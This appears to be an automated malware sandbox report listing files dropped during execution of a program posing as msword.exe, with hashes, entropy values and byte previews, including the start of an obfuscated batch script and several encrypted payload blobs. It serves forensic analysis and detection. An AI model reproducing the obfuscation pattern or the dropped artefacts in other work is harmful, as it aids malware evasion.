SHA-256:	6CBB7F387FA366BAA39242646A309996C7A6633D6ADDD810CF7F39BDE6A3FA86
SHA-512:	A76982DFF70FDFEA94B2791F13CD2CA29B8D0481B51CF4286DB9F493D0579045AAE3A8BFB22B671B99AD6F48512A79485088886634DC1FFC94E34ECD6CABF38D
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.4./.0.1./.2.0.2.5. . .2.1.:.0.3.:.0.8. .=.=.=.....

C:\Users\user\AppData\Local\Temp\Market

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	ASCII text, with very long lines (1646), with CRLF line terminators
Category:	dropped
Size (bytes):	30641
Entropy (8bit):	5.0857625939320155
Encrypted:	false
SSDEEP:	768:C0aoVID9DnEq27yfqXDHAPrGDr/prbVgEXVjwAjk04pv:Uoe9jEq2yK7ASn/9bVHlav
MD5:	971CB890AC9F35B6105DE0EB33095730
SHA1:	D113B90F9219237A611A8EE03040682DDBD93CE1
SHA-256:	CCF66550AC0BBD65AEFFEFFC0756F2E0669A88528F598350841CB68A6E48FBA4
SHA-512:	8CFABA88E6B9D55676A454F290A1CBB112624F6986CA441F48AE93F9132810D03337F42371BA3D5116B92B8BD1A5D12047D0139A9EF1700D6126FEE8BC70829E
Malicious:	false
Preview:	Set Operational=g..VTTbCalif-Holdem-Okay-Agriculture-..xCmIBrown-..DVwkVulnerability-Minolta-Republic-Purple-Exec-..vePermission-Take-Attempts-Recent-Salon-Successfully-Batch-Polished-..nZZDip-Atomic-Atomic-Works-Win-..MoGovernments-Rehabilitation-Ipod-..fKLQConfidentiality-West-Sunglasses-..Set Lion=B..oHteBridges-Includes-Ol-Speaker-Beverly-..SVpBukkake-Plasma-Trace-Missed-..DzFTie-Seeds-Browsers-Man-Lack-Achieved-English-Advertising-..krJamaica-Satisfy-Build-Fourth-Barnes-Legs-Iran-Generation-..DZVNSubsidiaries-Pin-Children-Org-Component-Separately-Ann-..iJTm-Buried-Sol-Scripts-Founder-Rd-Promotes-Burlington-Momentum-..UPlArtificial-Through-Credit-..sQSamsung-Samples-..HSAla-Distinction-Remedies-Clip-Parallel-..zpxNamed-Funeral-Stack-Each-Save-Compensation-..Set Beads=d..UALanes-Coffee-Awareness-Claims-Subdivision-..zVChart-Ru-Myspace-Frequently-..ZGTExtra-Adaptive-..yVLevels-Directory-Appointments-Groundwater-Older-Use-Rear-Xnxx-..CIPour-Den-Till-Range-Rotary-Celebrities-..Set Egyp

C:\Users\user\AppData\Local\Temp\Market.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1646), with CRLF line terminators
Category:	dropped
Size (bytes):	30641
Entropy (8bit):	5.0857625939320155
Encrypted:	false
SSDEEP:	768:C0aoVID9DnEq27yfqXDHAPrGDr/prbVgEXVjwAjk04pv:Uoe9jEq2yK7ASn/9bVHlav
MD5:	971CB890AC9F35B6105DE0EB33095730
SHA1:	D113B90F9219237A611A8EE03040682DDBD93CE1
SHA-256:	CCF66550AC0BBD65AEFFEFFC0756F2E0669A88528F598350841CB68A6E48FBA4
SHA-512:	8CFABA88E6B9D55676A454F290A1CBB112624F6986CA441F48AE93F9132810D03337F42371BA3D5116B92B8BD1A5D12047D0139A9EF1700D6126FEE8BC70829E
Malicious:	false
Preview:	Set Operational=g..VTTbCalif-Holdem-Okay-Agriculture-..xCmIBrown-..DVwkVulnerability-Minolta-Republic-Purple-Exec-..vePermission-Take-Attempts-Recent-Salon-Successfully-Batch-Polished-..nZZDip-Atomic-Atomic-Works-Win-..MoGovernments-Rehabilitation-Ipod-..fKLQConfidentiality-West-Sunglasses-..Set Lion=B..oHteBridges-Includes-Ol-Speaker-Beverly-..SVpBukkake-Plasma-Trace-Missed-..DzFTie-Seeds-Browsers-Man-Lack-Achieved-English-Advertising-..krJamaica-Satisfy-Build-Fourth-Barnes-Legs-Iran-Generation-..DZVNSubsidiaries-Pin-Children-Org-Component-Separately-Ann-..iJTm-Buried-Sol-Scripts-Founder-Rd-Promotes-Burlington-Momentum-..UPlArtificial-Through-Credit-..sQSamsung-Samples-..HSAla-Distinction-Remedies-Clip-Parallel-..zpxNamed-Funeral-Stack-Each-Save-Compensation-..Set Beads=d..UALanes-Coffee-Awareness-Claims-Subdivision-..zVChart-Ru-Myspace-Frequently-..ZGTExtra-Adaptive-..yVLevels-Directory-Appointments-Groundwater-Older-Use-Rear-Xnxx-..CIPour-Den-Till-Range-Rotary-Celebrities-..Set Egyp

C:\Users\user\AppData\Local\Temp\Matter

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	46380
Entropy (8bit):	7.996032413296538
Encrypted:	true
SSDEEP:	768:uG8mNPfvXXy+dsh2M+5PmQ7RY4wl/lIZZ7MW7ZkmYGfKhn8jzchmbDQ:78mNPycMePvKV/qZZPiGKABbDQ
MD5:	D4B3ADC8CBB57EAB0BF606DB6A43E118
SHA1:	356174D53E6491026EB1AC8EBCEF4CF718BCE17B
SHA-256:	85ACB62961BFFD09D7B492CE0F6D127E67A80E874BD66F3E50BB02B4BBBF6E16
SHA-512:	EAD4144CE24F579C7F0E5055620257674D907F5BBD3A65868847421675985C7D81422D9076F2FBD901CEC6835C81035D464916D8E94A0CE3C9C8014C0C3DFD01
Malicious:	false
Preview:	.A...._.WLB....).=NW...i.NWmV.J.k..L.F8....h..G..4..:..av{=..M1......)GJ.q..........iT..\}.$..\|..)...31....P<..L.....~.z.....s;.k...BJ..A.m.u....Ad.%.h..K..X...lsU...`....MqJ.;5.W{".VA.H;.s.6..ql.1]..i.KM..K.K..ZzZ.f...8.qQ?-.P..y..l....t..y..'...3.XkU.. ..zxEN.2;t..."....~.b.Qe]}jRMt9...\|.a..A.2..cG.....m.H+.P'..O.".K.Kx)e..e..[...b.a...e....D[...Y...cXE.A..1j.\.....7..jj..........v.y.......#. ..p....[...A..=.t..J..!Q....e:..8o....'h*.....z1.........Vw./r8...h....L.-..C.!...."./.......`(m>.;..I..O(].R.8. M.f.\|..t5.......)..`%/Bx...O...A...p......1..B....8.......H.(....?.T...k..V.Y?m.:#....M..<G,-.K.p./.{..z.-M..+@..c......j.>MALy.A.,..H.x...4]..M.=b.[N......E.........G7.H}.Es.G.......y....\|(.%...b..+.x.Q...r0=R..9....#.......8-.f...3....,.....;U....3...,....a.0".U.C1.g0s\|.>..@G.}.C%....~..+..j.)...nm.._..)N.D...........t^.9.kE6y...%..&.VC..}.xs.0...\|.eh R.d9g.......T...dMn"..f!1q.wd.Ra%t..;I...\..e...4m...b..K.?3..05...e..-....X.$....

C:\Users\user\AppData\Local\Temp\Metallic

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	151552
Entropy (8bit):	5.35483837732914
Encrypted:	false
SSDEEP:	1536:iKaj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo2+9BGmo:86whxjgarB/5elDWy4ZNoGmo
MD5:	ACAC13DC82CE749F727F0C81BA5FDC73
SHA1:	5350FE77594467906A5251B8C2248CD81D15D8E2
SHA-256:	B6A35AC20BAED2784E793E577670B5AE1062890CB9BC4D931A9F0BC874B2A612
SHA-512:	C86B8DD695DAE4626631AF41497C73250A73967E28A9F3472F2D344C4FF2F7FBAF9101FBD5EC45124537DF823951C5E09FE0696488AD599D6AFA77DDB918364F
Malicious:	false
Preview:	.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.!.!.!.!.!.!.!.r.r.r.r.r.r.r.r.r.r.r.r...........r.r.r.r.r.........................)...........................r...........r...r.....r.....r.........................................................................................................................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r

C:\Users\user\AppData\Local\Temp\Peripheral

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	7.99766272586728
Encrypted:	true
SSDEEP:	1536:rY1/zHVTJE2KI6zH3+Te0hDcnNsoExtf4Ahg/IdAGIrYJy6B8:rEbVTJxKlzH3we0aA74cIYJG
MD5:	2C4CFD8A5B0E70B3B8E872FC1091C9CA
SHA1:	2C6C8DC12CA41DA972D3B393129506C9B9CBA0CD
SHA-256:	E7051EC0A2700737D0C85441EF433D0041451623346D2933F4AD602C88C83BDE
SHA-512:	19E74E8777D5FB850CECF1E95219F7EBC8648C29A24647B72CE94A5E1286CA3FCFFA9FD8AD19F689B1A3466A109DAFBA2D10DBC85FDC1610FC0716CE4018174E
Malicious:	false
Preview:	.....,`.L..`.$.\F.\|.9$......\|.?.'UB..Z.p.......7.7.k.).1.S.Mu..#...; ejR.z...Y.}.H..NuT..N...L.!.u.$.`fW..M.L$d`..'.%......6..1.<.Q.]..Q.2..??bH........D..T..\|~."W..1.+ck.5h....a...[.?~...6..%.$$dQ.\..j.ho+.........7......e....p..\Mh"...#{u..F...?.....]#.s?....[.A..~^....\|^+......]..b.........+](..%...`....j-....&y.Zm.j[...`=S..K..Wg@ebB.7Fb.K...\I/...Y.....@.8E.e...'8.}v.7..z..S.#@...`D..mh6i..L...$..9...Ay.N.'YR.r#......."Q..3...x_..r......\.....;......`...$\BH.....>l"gg..Q.e........S.Y.[e"... .{.}..M6..V.(v.....>.<AY.Ih......$...(0...J.Q.L.IT.:3<S...y.M.$..,.#..IX."....K...yE./>.6.......M[.I3.3\|r.7.v...R.&.GR ...?..%.mn....R.......~.....v.... `N...DB....... ..u..::P....R...8..I....."....f1.......@bk....[.D"..;*..i.......a...3......k4~........o..3...D..,...O.>.p..n.!.~'?In.J.3.cdQ.......cD...B&.....x......6...@...^u$.3....~z...Z..`.B...f..K....d.aYy...d...M..P..(.W6...,Z2.:.)....l.E'..D......C.8.S...E.j...N3.j..\|...a..z...bJ..@

C:\Users\user\AppData\Local\Temp\Phentermine

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	68608
Entropy (8bit):	7.997800401356153
Encrypted:	true
SSDEEP:	1536:elqGCsW9l+3prMB5cOkKl+9yib0wRGnqJpxQbEvleUtqrc3HxO:eHCsW9KlMCsBib0wRzybHURO
MD5:	49EFDFC03CCDA219825C385B3B35FB43
SHA1:	CB1B3E7C95E0C457DE0A8879073301B44A12FA3A
SHA-256:	F98C5BCC2A2A7ABDC448A2C048326AED45A9A914A2AB3EA4D1BA4ADA7D810144
SHA-512:	560FE3EE3F80850EB5D6813327D165AF384B31691D35694C4E4385F5B0BB895747042D97D4F63C9FA611ACA0A642924CF9DEAD30EC035EEE62A87FDDBCD1B8F4
Malicious:	false
Preview:	....a.W....>.2<1?..i..5.wapA...K1.x^[.$F.._..+ZlT.yk..8/..f:...\P```.......I@pXOx)].........0.....!.....R;N).M.i.:....]...QbAQ..;..X..k..fj..Fh....3[.....D..!..nt..s..v...M\|~..(..Y-O.[91....G.ne.e.#9.X...0.......h>.6....y..M{&..`.{ ..B.DR7h.9.......K<".9..X.Jb0w.-..@.\|....7e.+.Y^w.3....)-........VmM....<MR.V..Hc..<.e7..G.R.mG......../..d.\|R#.>87$....S..R.~.2..j,..b.....r......e(..7"..3.R....h...J...J9.l.......27V.E.0rg.)%.t..T(....k.\.....x......Zw.".?.]?._.Y..z.IG.".b.w.4.GX.w..n..9}.=.......-..@.Q.Z...-........f/.5..(....D.....j..i%;.v.k}.J8.l...>.dl.\|..cE..8@=....\..4....'..}...M...Ze..%.<%lk.....O..!?.l..,.t..Z.a.....6..S6kD.%...e............U...Z..8..cG-Q.=.AQF..F.s....B..=x:.s&..A8CC....^...3/n..R..YO ...^.l...=.~.d.a.1..7....'.:$..H:1..3Z=..4MH.LR&+}M..........V[....!.....v.v..{.9.%....>Hu...P..Av.$l.7........1;...~...BN..!.1.*.........JI#...l=.......Q.).`...e..J.q...=..E..7'!...b..~L.`.:.Y..........\|.......c.?..s&....e.<.......

C:\Users\user\AppData\Local\Temp\Presidential

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	37009
Entropy (8bit):	7.161342216267482
Encrypted:	false
SSDEEP:	768:E9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:EATGODv7xvTphAiPChgZ2kOE6
MD5:	54C230191C78CF10807F0D4EAA561CBF
SHA1:	70A2B2019668F5BB8C3D58C64EEB34C9907B55E6
SHA-256:	A656398863A57CA942F748B9A697DE3217C0E1843679D1E8D6C8AC98F8C1E02A
SHA-512:	3F195D1212295BE976285DF384612F26E174E1F2DE679B209EF8861999E430DE13EA6E3DEC8747F4DDF227F44DFEB2A6112D137CB208572C5EF9B4F2D42502DF
Malicious:	false
Preview:	3.3.3.3.3.3.3.3.3.3.3.3.3.3.4.4.4 4$4*4.444>4H4R4]4e4i4o4s4y4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.5.5.5!5,54585>5B5H5R5\5f5q5y5}5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.6.6.6.6.6!6+656@6H6L6R6V6\6f6p6z6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.7.7.7.7!7%7+757?7I7T7\7`7f7j7p7z7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.8.8.8#8+8/85898?8I8S8]8h8p8t8z8~8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.9.9.9.9"9,979?9C9I9M9S9]9g9q9\|9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.:.:.:.:.:":,:6:@:K:S:W:]:a:g:q:{:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;";&;,;0;6;@;J;T;_;g;k;q;u;{;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.<.<.<#<.<6<:<@<D<J<T<^<h<s<{<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=.=#=-=7=B=J=N=T=X=^=h=r=\|=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>.>#>'>->7>A>K>V>^>b>h>l>r>\|>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?%?-?1?7?;?A?K?U?_?j?r?v?\|?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?...@..8....0.0.0.0.0$0.090A0E0K0O0U0_0i0s0~0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.1.1.1.1$1.181B1M1U1Y1_1c1i1s1}1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2.2$2(2.22282B2L2V2a2i2m

C:\Users\user\AppData\Local\Temp\Query

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	6.68140784602293
Encrypted:	false
SSDEEP:	1536:9U0pkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI93s:9UDQWf05mjccBiqXvpgF4qv+3s
MD5:	E5F5603745AC7E491627F61F770384E1
SHA1:	71B49644F3C8659C075CFA4CFDDBA22588131FB1
SHA-256:	9706522D1D008FE36CC3D7BB32A3C33B18530BA86A7E5E557B0D95ECE20BE281
SHA-512:	6D84B641C97BF6DD3C075EB59803D97483E3167D1D72871BE14B1F9519751D6A74AC973BF9E50D5A3D5A7B954DC939A8063DD91EA1123581170053C48D9C5237
Malicious:	false
Preview:	.3.M.............e...........Y...3.P.u(..`....u P..H...P..d...P......P.E$..U.PS.u.E.Q.u..M.P......4...._....M(......]..IX;........E......;............;.........`....u.j)Zf9........},........U..U.........B....M...\|....M..M..M..M..M.M.3..\........;..d.....O....}.........................H....]...D...3..u..u(.M.P.u..v@S....3.....9...v.......w....M...u..G....w.....M.E..E..E..M..M...\|....E...........................j.X;.......j.X;........M.....3...j.X;...(...;... .....j.X;...&...j.Y.G.;.K ..+K.....#U..}...U.M..."....U.j.^f.:..U......j]Xf9F........ ....M..M....\|....M..M..M.;...%.......E...l....E.;...(....U......],.......t.....+.G.;.......j.Y.G...U....jxXf....f....f.....@...U....SV.u......W.}...U.M.;........E.3.M.........%.....E........u.;.w/.}...+.A..M.............:...F..:;.v.u..}..E.......w......;........E._^[..U..V.u.W..t...9N....I.Bf;.t......H_^].3...U.......SVW....1L...3.}.B..A.......;.......jw[..>..j.Y..}........u...........f;.......@f;............f;........

C:\Users\user\AppData\Local\Temp\Syndicate

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	89088
Entropy (8bit):	7.998187805046269
Encrypted:	true
SSDEEP:	1536:KSaJEMoNVX8cEynrHSHmrTLT8SJj9PEv/61VZApRnWEmx/4gzVja:4vozi0rZ3Jp8nWkRnTy/Ra
MD5:	5EBB42ADED1C56715BA1EC98BC2638F1
SHA1:	9B3AD86BE972BC59ECF45C249FD38A4DFD762FFF
SHA-256:	D302B56F0FABFB24855D94C90BBDD829837B8FA85B1C6777CF2E20B5526BB602
SHA-512:	256645AC47FE31AA2147906BC5A53BA328F288E20D44ADCD0ADFF9E386DDDF63A8C9A161D675F35E56443985A6D811F0FED2F48C526A17C0923B6653D4EE2CA5
Malicious:	false
Preview:	....R...e.".>..?.%R;<..2.....E.....6.P.?...<{......p..B....K..$...T....83H...JD.....CX...[Z.m.h/.]...+e.&..h.....y..............4x.)...{..E"........6..s>#{.%C..t.E.C...{6..........G.x.\|..........>w..9.9......F..K9..?..w...'Npv....x?u.\\...O.=.....1.y......^......b].(....5.sk..G..B%..s.6...P...U...K.D.{.Fp.?9.fl_.{.`...'.......PN.#.....5...D......u....?.m..\..G...HM7u.....K}...;.M.]..E.`..!X.i....j..s_nX.W....^...6.K;...BZ...2..)I}.?...0..h..).0.s..%Tr...~...kC.JZ.n:...c..X..yUAB.Xj..N..\|......l8.V(0e..Ml.iG...7...m.6..kX..kZ....y/<..^..1.F...t.....U0...,.1.p...1../.Z...A.>.....F..Ow.^.. .0...V.m.........Nl...xy.V.................ic.+...k..^......C.y...I..hg...a..y8B.........O...b.1...C}...M.VT. .....@.l,...H.7..y....1.......\T..81%..9.s/..M..F.I.c,. .\.,M@=.tb.wy..O...O..g.,*.9.I......R~...$.....(f....7..~T../l..y........,S.MmbT.<.$J.k...`.........'..oV.4.)KW.-.3q...ypE]....<..'..A......b4..IUH4`.N.......Rz..^...S..t.m.i....7./.ze

C:\Users\user\AppData\Local\Temp\Usgs

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	75776
Entropy (8bit):	7.997337841606491
Encrypted:	true
SSDEEP:	1536:YFpYViuJWu7d6d6xm/8PleBlivu2/a3gvGUttQue1:YDYsuvS8PBvu2bu791
MD5:	86BDDDBF60A6B1CE21D695171B5B50A7
SHA1:	3EDCC074129F105DB4EAD779D08BE20D6812EE15
SHA-256:	A3A5647BB284F7F395407A00D9EFAEACF0D54C8E79FBA8BC28FE826183F24EAA
SHA-512:	26657048694FB307E80BBE91964BF4DFEBAFD0729669CD9F2290C7E139EC1CE21C3410CEBA3B7C2F0CE3A4DBF57BFB62248670DC9CB9CCCE3BAF1096E484C27D
Malicious:	false
Preview:	A...../"..}....X...2u.).)...8.n.O..+......JG....z..U..y....g...(...NJ...+j..y...g.ar.R..~........!5..^ .<......(...K...@..5..#..w.@,9..d.1.\^...E...^...g.zxTbi.i-y...{;a..3.e...N]a`}..q.Q.....Mt...Y.Tz...;...?v......C.k..fZg.\...4I....>i..`:..Q&....1.g..c........M..'....'.O....F ..W..J.....2.U.x..Z}.o.....9.x........6..Q...M\|F=..@...pV...F.HwE.?.&...`b.j...c.8\|.l..Kp.%)].F...-...q......z.=...A&..s..7..F..2..R.........-..#N..q..M...(I...H...r@.-P...0.&...[.$.v......\|..6....xFp..gR..u\|....L.l..II.H.g.^+K.v.....9..x...P&(n.l.W.[.J.LoE'.. ....T._...\|W.g..$.q)..e.q..=.<..J6....,A&..=.J.9S...,8+e-zL...../qM.2G...)....4. ...e...v...mu,#.>..._.%m.....0.......z..*Yf;n.H.3...'.....~H.x..0...u...V..).L..o..x.q(..!F.J.).Ht.q..o.!..>A..NR..M.b.u.7......Q4.3..p...kR&t......Gp..C.. .6...'4B...;7......Kh1S...m.t..mfR.+.....sB#Z.....>z.'......\|.@yg.....pa.3.s....=....f.....Uq...V..,:Z(.GJ6.-d..n.....CF}i.?...........M.I ....d..U..-.R..9.#H......>.M.SL.

C:\Users\user\AppData\Local\Temp\Veterans

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	130048
Entropy (8bit):	6.658223104333049
Encrypted:	false
SSDEEP:	3072:Z0Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBZ:QbfSCOMVIPPL/sZ7HS3zk
MD5:	5CD6AF8D1D071C54D081DF22F7D057AB
SHA1:	330782E2FCEB552E894643FDC40AFFADD187044E
SHA-256:	BCFBF03BFE8181B81F3A1FF2D3774233CE013596FB3F4F535819FC422B696CEE
SHA-512:	4F6CB5F41F5D338B998A075C532EB500806463C14FB9AB0B3945CA5AA24CC2DDD12F3D0E02D91FEF513AA3602A9E29CF69ABBE12181BA625DFC7F0E325F3D6F7
Malicious:	false
Preview:	......L...A;.v.....8.u.F.........@...u..v...............^....~.3..~........9=."M.t.V................h.....F.WP.qV.....kE.0.E.....L..E.8...t5.A...t+..............s.....L..D..B..A.;.v....9.u.E.G....E...r.S.^..F....................E..N.j.....L._f...R.f...I....u.V.....Y3._.M.^3.[..=....].....I..."M.....I..."M.....U..U.W3.f9:t!V..q.f.....f;.u.+.....J...f9:u.^.B._]..U..QSVW....I...3...tVV....YWWW..W+...SVWW....I..E...t4P..j....Y..t.3.PP.u.WSVPP....I...t...3...3.W.[..Y.....t.V....I._^..[..]..VW....I.....u.3..7SV.+...+......S.i....YY..t.SVW.?.....j..6[..YV....I.[.._^..U....S.]...u..$$............\|VWj=S...S...E.YY..tN;.tJ.x...5..M.....E.;5..M.u.V........E.Y.5..M.3........9].t/9...M.t'..N....un.#...........W.Z..Y_..^[..]..t.3...j.j...}..S...M..kZ...5..M......t.9...M.u%j.j...}..S...M..BZ.....9...M.t..5..M...t..E..+.PQ......E.YY..xH9.tD.4...Z..Y.M.8].u..E.........D.....A9..u.j.QV.HX..S....Y........tX.P8].........E..H.;............?......j.QV..X..S...Y..............M..

C:\Users\user\AppData\Local\Temp\Viewed

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	55296
Entropy (8bit):	7.996808997159829
Encrypted:	true
SSDEEP:	1536:v8HYZV3DRdZOzj3zNzH65bsZj94bitw+XZ/VCuc:3SzFbaoH1/VCd
MD5:	01E51A0D2AC4E232BB483444EC14F156
SHA1:	8DB19310817378BCF4F59F7E6E8AC65E3BAD8E2F
SHA-256:	27D2E36B97DBA2657D797098D919F7C76893713537FF4ABA5F38CB48BC542EF9
SHA-512:	C982A98AE76F1DC6459F868C9F7B79D9CD3372C2045FD10FA1A876EC03367F77E4BE9CCD27BBEAEB58E8C3C06E838A7DE44057069F8CF1E7925CEA14397E0962
Malicious:	false
Preview:	...0.p;...Z...W.aM..:.3p3...^6.@!...R.G..9......S...)`G...<\..X..y.$D.4.>m..c>....)S)...Q.gxuw......+......?e.i..7)...u...$.....&..g.....rwZ......M.2.`...@.?<..l..m..-.}_..P3..........\|..~\|)(k...Cc.N.J...i.H..[S(...d.......n2zst.A...[V2x.[.........L...\ut..x(.5'j.W..t..N..W.`7..D.j.?...R..27.M..elZ...e.(!,K...J.;Fw.V.g.]-..C.-.n8Au....\|U..D$.]....h..0.l....W..-..E>Q,.?..v.q....0.....L..R.39uH.I.6..:. ..j...$$QW.#..m1.....4..=v...`1.M..f.....XL....R...M..x....P..S...'.G..6..^.+S.H.x...\|.%B....]...+.!81$C..uI...w...S....>.gz....V.\|.K..j..W{...a...-\.n...t0L../.w.:Q...(V.(]......RSs@.O.........vNB..U`v.C.....<H.}.WE....g{v.......Aq.l....<D.3..c^..#.@.w.9f..78t5l..]..%..AUCT.=.s.=.}..m....wr.W..7==..9.L.~..b~}^....a...F....Q.0>fH.....Y....s....?..!.e..!.3..R.S8.fY.......?..6l..;p+T.4...f\|..sor.e......x..lP.U..<.........k...B.,..H../....qY..... ..R0Xn..ygP.%..B..m."D.5..).8.wh.=..Y.D.......7...d:.sz.{.R.)m..~...i;.......s.9D

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2u3mqzny.qva.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aeberttu.ntc.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bvjo1ddz.gfs.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_byshi4fw.jms.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cqdqbr3t.tu5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_grtqifhx.3tj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
